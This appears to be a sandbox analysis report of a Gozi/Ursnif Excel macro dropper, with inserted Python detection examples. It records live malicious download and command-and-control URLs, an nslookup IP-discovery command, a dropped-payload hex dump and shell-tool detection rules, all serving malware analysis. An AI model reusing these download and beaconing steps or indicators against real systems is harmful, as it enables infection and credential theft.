Analysis Report xls.xls

Overview

General Information

Sample Name: xls.xls
Analysis ID: 350432
MD5: 0e6d3ca70f81e25baf88e5a2bb5cde7e
SHA1: 830932f1ec44148a6327f08d95b2ebaa4694d2ad
SHA256: b2701be6d7b593433a48955c5613953470e2c807a87fa18eb33334da66dd41b0

Detection

Hidden Macro 4.0 Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Gozi e-Banking trojan
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Dot net compiler compiles file from suspicious location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Contains functionality to detect sleep reduction / modifications
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Hijacks the control flow in another process
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Office process drops PE file
Overwrites Mozilla Firefox settings
Searches for Windows Mail specific files
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Uses nslookup.exe to query domains
Writes registry values via WMI
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
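Several of the signatures above are Sigma process-creation rules (Microsoft Office Product Spawning Windows Shell, MSHTA Spawning Windows Shell, Dot net compiler compiles file from suspicious location), and the Networking section below records the nslookup lookup of myip.opendns.com. The Python below is an added example, not part of the Joe Sandbox report: it replays those rules over constructed Sysmon-style process-creation events modelled on the process chain this report records (EXCEL.EXE -> rundll32.exe, mshta.exe -> powershell.exe, cmd.exe -> nslookup.exe). The command-line arguments, the "suspicious" directory list, the csc.exe Add-Type pattern and the 1000-character length threshold are this example's assumptions.

```python
"""Sigma-style process-creation triage over constructed Sysmon-like events.

Added example, not part of the sandbox report. Events use Sysmon Event ID 1
field names (ParentImage, Image, CommandLine). Image paths are taken from
the report; arguments, directory lists and thresholds are assumptions.
"""
import ntpath

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
DOTNET_COMPILERS = {"csc.exe", "vbc.exe"}
# Assumed "suspicious" source locations for an on-the-fly .NET compile.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\users\\public\\",
                   "\\programdata\\", "\\windows\\temp\\")
EXTERNAL_IP_HOSTS = ("myip.opendns.com", "ifconfig.me", "icanhazip.com", "api.ipify.org")
LONG_CMDLINE = 1000  # assumed threshold for "very long cmdline option found"


def _base(path):
    return ntpath.basename(path or "").lower()


def evaluate(event):
    """Return the names of the rules the event matches, in a fixed order."""
    parent, image = _base(event.get("ParentImage")), _base(event.get("Image"))
    cmd = event.get("CommandLine") or ""
    low = cmd.lower()
    hits = []
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("Microsoft Office Product Spawning Windows Shell")
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("MSHTA Spawning Windows Shell")
    if image in DOTNET_COMPILERS and any(d in low for d in SUSPICIOUS_DIRS):
        hits.append("Dot net compiler compiles file from suspicious location")
    if image == "nslookup.exe" and any(h in low for h in EXTERNAL_IP_HOSTS):
        hits.append("External IP lookup via nslookup")
    if len(cmd) > LONG_CMDLINE:
        hits.append("Very long command line")
    return hits


def triage(events):
    """Return (image basename, matched rules) for every event that fires a rule."""
    flagged = []
    for event in events:
        hits = evaluate(event)
        if hits:
            flagged.append((_base(event["Image"]), hits))
    return flagged


EVENTS = [  # constructed; image paths from the report, arguments assumed where noted
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "CommandLine": r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" xls.xls'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\fyjh\zglgy\lckhvmn.drhdh"},  # arguments assumed
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc " + "QQ" * 600},  # padding stands in for an encoded command
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\abc123.cmdline"'},  # assumed Add-Type pattern
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup myip.opendns.com resolver1.opendns.com"},
]

if __name__ == "__main__":
    for image, rules in triage(EVENTS):
        print(f"{image}: {'; '.join(rules)}")
```

Parent/child matching is done on image basenames so that the same rule fires for C:\Windows\System32\rundll32.exe and the SysWOW64 copy; in production the rules would be fed from a Sigma backend rather than hard-coded, but the matching logic is the same.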

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://online-docu-sign-st.com/yytr.png Avira URL Cloud: Label: malware
Found malware configuration
Source: rundll32.exe.1920.4.memstr Malware Configuration Extractor: Ursnif {"server": "12", "whoami": "user@134349$]", "dns": "134349", "version": "250177", "uptime": "1079", "crc": "2", "id": "3131", "user": "7035163551f465eb3c6bced5387f24a3", "soft": "3"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png ReversingLabs: Detection: 38%
Source: C:\fyjh\zglgy\lckhvmn.drhdh ReversingLabs: Detection: 38%
Multi AV Scanner detection for submitted file
Source: xls.xls Virustotal: Detection: 16%
Source: xls.xls ReversingLabs: Detection: 10%
Machine Learning detection for dropped file
Source: C:\fyjh\zglgy\lckhvmn.drhdh Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.rundll32.exe.400174.2.unpack Avira: Label: TR/Kazy.4159236
Source: 4.2.rundll32.exe.430000.4.unpack Avira: Label: TR/Crypt.XPACK.Gen8

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.22:49194 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000004.00000003.2382947063.0000000004910000.00000004.00000001.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000014.00000002.2415948225.0000000001FB0000.00000002.00000001.sdmp

Spreading:

Contains functionality to get notified if a device is plugged in / out
Source: C:\Windows\explorer.exe Code function: 28_2_02919064 RegisterDeviceNotificationA, 28_2_02919064
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_003851E8 GetModuleHandleA,70D9FFF6,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_003851E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_00477AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_00477AA8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02359B00 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_02359B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234E8CE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_0234E8CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349945 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_02349945
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_02349F54 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 4_2_02349F54
Source: C:\Windows\explorer.exe Code function: 28_2_0291EEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW, 28_2_0291EEAC
Source: C:\Windows\explorer.exe Code function: 28_2_0291537C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 28_2_0291537C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_0234BB01 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 4_2_0234BB01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: yytr[1].png.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 29MB

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025169 ET TROJAN Windows Executable Downloaded With Image Content-Type Header 8.208.96.68:80 -> 192.168.2.22:49165
Source: Traffic Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135 -> 192.168.2.22
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Tue, 09 Feb 2021 10:53:09 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Mon, 08 Feb 2021 15:52:01 GMT ETag: "73c00-5bad5268b0a40" Accept-Ranges: bytes Content-Length: 474112 Connection: close Content-Type: image/png Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 80 05 00 00 b8 01 00 00 00 00 00 4c 8e 05 00 00 10 00 00 00 90 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 07 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 05 00 28 22 00 00 00 60 06 00 00 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 68 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 80 7e 05 00 00 10 00 00 00 80 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 3c 12 00 00 00 90 05 00 00 14 00 00 00 84 05 00 00 
00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 95 0c 00 00 00 b0 05 00 00 00 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 28 22 00 00 00 c0 05 00 00 24 00 00 00 98 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 68 65 00 00 00 f0 05 00 00 66 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 1a 01 00 00 60 06 00 00 1a 01 00 00 22 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 07 00 00 00 00 00 00 3c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
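The response above is the core of three signatures in this report: the server declares Content-Type: image/png while the body begins with an MZ header and a PE signature, and the same payload is then written to disk as yytr[1].png and as C:\fyjh\zglgy\lckhvmn.drhdh (Drops files with a non-matching file extension). The Python below is an added example, not part of the Joe Sandbox report: it parses a raw HTTP response, compares the declared Content-Type with the body's magic bytes, walks the DOS header to the PE signature to read Machine and NumberOfSections, and applies the same sniffer to a dropped file's extension. SAMPLE_RESPONSE is constructed: the header lines are those shown in the dump, but the body is a minimal PE-shaped byte string that keeps only the "MZP" stub signature, the 0x14C (i386) machine and the six sections visible in the dump; the real DOS stub and e_lfanew of 0x100 are omitted.

```python
"""Content-Type versus magic-byte check for downloaded and dropped files.

Added example, not part of the sandbox report. The sample response is
constructed: report headers plus a minimal PE-shaped body.
"""
import ntpath
import struct

PE_MIME = "application/vnd.microsoft.portable-executable"
MAGIC = (  # (leading bytes, MIME type), checked in order
    (b"MZ", PE_MIME),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF8", "image/gif"),
    (b"%PDF", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "application/x-ole-storage"),
)
EXT_MIME = {".png": "image/png", ".jpg": "image/jpeg", ".jpeg": "image/jpeg",
            ".gif": "image/gif", ".pdf": "application/pdf", ".zip": "application/zip"}
EXEC_EXTS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def sniff(data):
    """Return the MIME type implied by the leading bytes, or octet-stream."""
    for prefix, mime in MAGIC:
        if data.startswith(prefix):
            return mime
    return "application/octet-stream"


def parse_response(raw):
    """Split a raw HTTP response into (status line, lowercased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.decode("latin-1").strip().lower()] = value.decode("latin-1").strip()
    return lines[0].decode("latin-1"), headers, body


def pe_summary(data):
    """Return (Machine, NumberOfSections) for a PE body, or None if it is not one."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 8 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return struct.unpack_from("<HH", data, e_lfanew + 4)


def check_response(raw):
    """Flag a response whose declared Content-Type disagrees with the body's magic."""
    status, headers, body = parse_response(raw)
    declared = headers.get("content-type", "").split(";")[0].strip().lower()
    actual = sniff(body)
    return {
        "status": status,
        "declared": declared,
        "actual": actual,
        "mismatch": actual != "application/octet-stream" and declared != actual,
        "pe": pe_summary(body),
    }


def check_file(path, data):
    """Flag a dropped file whose extension does not match its content."""
    ext = ntpath.splitext(path)[1].lower()
    actual = sniff(data)
    if actual == PE_MIME:
        mismatch = ext not in EXEC_EXTS  # a PE hiding behind .png, .drhdh, ...
    else:
        expected = EXT_MIME.get(ext)
        mismatch = expected is not None and expected != actual
    return {"path": path, "actual": actual, "mismatch": mismatch}


def _constructed_pe():
    """Minimal PE-shaped bytes (constructed, not the real payload)."""
    dos = bytearray(0x40)
    dos[0:3] = b"MZP"                        # Borland/Delphi-style DOS header, as in the dump
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE header right after the DOS header
    coff = b"PE\0\0" + struct.pack("<HH", 0x14C, 6)  # IMAGE_FILE_MACHINE_I386, 6 sections
    return bytes(dos) + coff + bytes(16)


SAMPLE_RESPONSE = (  # constructed from the header lines in the report
    b"HTTP/1.1 200 OK\r\n"
    b"Date: Tue, 09 Feb 2021 10:53:09 GMT\r\n"
    b"Server: Apache/2.4.25 (Debian)\r\n"
    b"Content-Length: 474112\r\n"
    b"Connection: close\r\n"
    b"Content-Type: image/png\r\n"
    b"\r\n"
) + _constructed_pe()

if __name__ == "__main__":
    print(check_response(SAMPLE_RESPONSE))
    body = parse_response(SAMPLE_RESPONSE)[2]
    for name in (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\yytr[1].png",
                 r"C:\fyjh\zglgy\lckhvmn.drhdh"):
        print(check_file(name, body))
```

The check deliberately treats an unknown magic as "no opinion" rather than a mismatch, so only positively identified types (here a PE served as image/png) raise an alert; this is the same reasoning behind the ET TROJAN "Windows Executable Downloaded With Image Content-Type Header" Snort rule that fired above.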
Uses nslookup.exe to query domains
Source: unknown Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK, Date: Tue, 09 Feb 2021 10:53:09 GMT, Server: Apache/2.4.25 (Debian), Last-Modified: Mon, 08 Feb 2021 15:52:01 GMT, ETag: "73c00-5bad5268b0a40", Accept-Ranges: bytes, Content-Length: 474112, Connection: close, Content-Type: image/png. Data Raw: 4d 5a 50 00 ... (same 474112-byte MZ/PE response as listed in full under "Downloads files with wrong headers with respect to MIME Content-Type" above)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Windows\explorer.exe Code function: 28_2_02912690 InternetReadFile, 28_2_02912690
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ
Source: global traffic HTTP traffic detected: GET /yytr.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: online-docu-sign-st.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /manifest/epAdaEbgmyrS0/5cBg2_2F/5r8v5YqebG9_2BzXwQ53Or2/m_2BYyZlMo/Wjgc3SrdyI1oKZciJ/0VZWBVvz9ttQ/e_2BqGDPIqO/VywJMmm_2FxNKs/BOcG3xAwzit4RyHpLyJsr/vwEVLjnqkBMf1zrK/m34BDAlEVdkNvcp/4fnxbyz8Lb2BtkfzoG/Qmy6EiDgS/W_2BAz08nRnapN/NuB.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: PHPSESSID=42h5h7018t3pv8k72ad9a3bh91; lang=en
Source: global traffic HTTP traffic detected: GET /manifest/8LuXDq_2BWfBiB/BEj6sfjtywNrZQzF5QZK7/NbbMkjR9SpGW28t6/1m9JUJz0exuG0Ws/6b83q2bcM1KtQpqf51/Z_2B1SUtN/P_2FDTQIaszfL7CFhXYP/tmsBI8pqKk7pm_2BfxZ/6rZJurPMhY6pGTLji_2FEt/IMZgEgmplBU7m/NokZx7zj/OP_2FSvKpKSMcRmuUdUVqR0/teCNe1.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: global traffic HTTP traffic detected: GET /manifest/t9KapG5Lp7Zt_2Fa57QG/GX7C0FfmRVPiI55eGvl/6x2VyI3ttROAIozUzpTtuU/djl44EXt9ama4/XR_2FoMg/DUUaeRp34H0CCf_2FqktcZq/z9PSxtll7Y/oj4uvWMlnUr2X5bcU/HYCHWM70nrfm/_2BgTKf7qxG/3cOw5VQBP7LVAf/95TW5v6vv1PzXG2YnDn_2/B53HOO92/81PS.snx HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: pronpepsipirpyamvioerd.comDNT: 1Connection: Keep-AliveCookie: lang=en
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: online-docu-sign-st.com
Source: rundll32.exe, powershell.exe String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, powershell.exe, 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: rundll32.exe, 00000004.00000002.2416709074.0000000002340000.00000040.00000001.sdmp, rundll32.exe, 00000004.00000003.2378828561.00000000022D0000.00000004.00000001.sdmp, powershell.exe, 00000014.00000003.2380930371.00000000028D0000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2420148459.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416331199.0000000001D60000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341263910.0000000003730000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: mshta.exe, 00000013.00000002.2341613809.0000000003D40000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2420638109.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2416494035.0000000001F47000.00000002.00000001.sdmp, mshta.exe, 00000013.00000002.2341411688.0000000003917000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
